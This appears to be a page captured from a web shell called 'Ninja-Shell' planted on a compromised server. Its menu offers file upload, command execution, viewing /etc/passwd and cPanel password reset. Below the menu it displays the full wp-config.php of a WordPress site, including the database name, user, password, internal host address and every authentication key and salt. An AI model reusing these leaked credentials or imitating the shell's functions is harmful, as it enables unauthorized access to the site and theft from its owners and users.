{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: /var/www/abfall-verwenden-de/WordPress/wp-config.php
<?php define('WP_CACHE', true); // WP-Optimize Cache /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'db_abfall_verwenden' ); /** Database username */ define( 'DB_USER', 'wp_migration' ); /** Database password */ define( 'DB_PASSWORD', 'TebMigration2026' ); /** Database hostname */ define( 'DB_HOST', '192.168.178.162' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '?v@K5mgsVYmq,q$dSU=4J vi6U2jchR[2V!!J-JFf(,#*^(B!Bu~,W!`,7ldiby%' ); define( 'SECURE_AUTH_KEY', '`eCne~2r?R;=wz.].YSL$oLve2fOy(Ni^p-X]pO{L*C+`A@|`V(GsNXxbZ0ASvM|' ); define( 'LOGGED_IN_KEY', 'Yg.@JG1r^*H$,H1f-qBE.2a#Zw_0`<L~sgt9{W6uRO]?+DKEIldsIcBpPQ|uFV1?' ); define( 'NONCE_KEY', 'f}1k5NXE5a|ZuMR8~G}woSdvv,|C1~tz-C5r~hvx/q+O/%j`_&wy#eXIj{ZFJJzK' ); define( 'AUTH_SALT', '`!;_PvVP<slr^mT0Y6f|,iI}kP{M/X [U>rcmH|,v.![R8SWogSM,:3j&Ywzim,@' ); define( 'SECURE_AUTH_SALT', 'Qd8m1G72`g18#h{G9BbV]e`D,e^tHrl=$`IM!5c:Y=f`A}-#Tc}B2&@[#}+=FQ}X' ); define( 'LOGGED_IN_SALT', ';(;QwP4M&&f2_Zr<r4u.y;$=</w|[r*z>A8|?DowNSB#iB<n`Q-v<s?/Ts,0._k+' ); define( 'NONCE_SALT', 'U[P}R Y-~+EI@v;*E1=J`XzNIu3pW&,:xqo%QqY8UJh*h1zFjd`l2f:ALz^ln@#V' ); define( 'WP_CACHE_KEY_SALT', 'KEz,K{`VAYVTRkWD,aH+]<F(@[L]?qtKvtLutr%C~7Fr-]HsJCE)sJb[>F7-K8oN' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /* Add any custom values between this line and the "stop editing" line. */ /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
./Ninja\.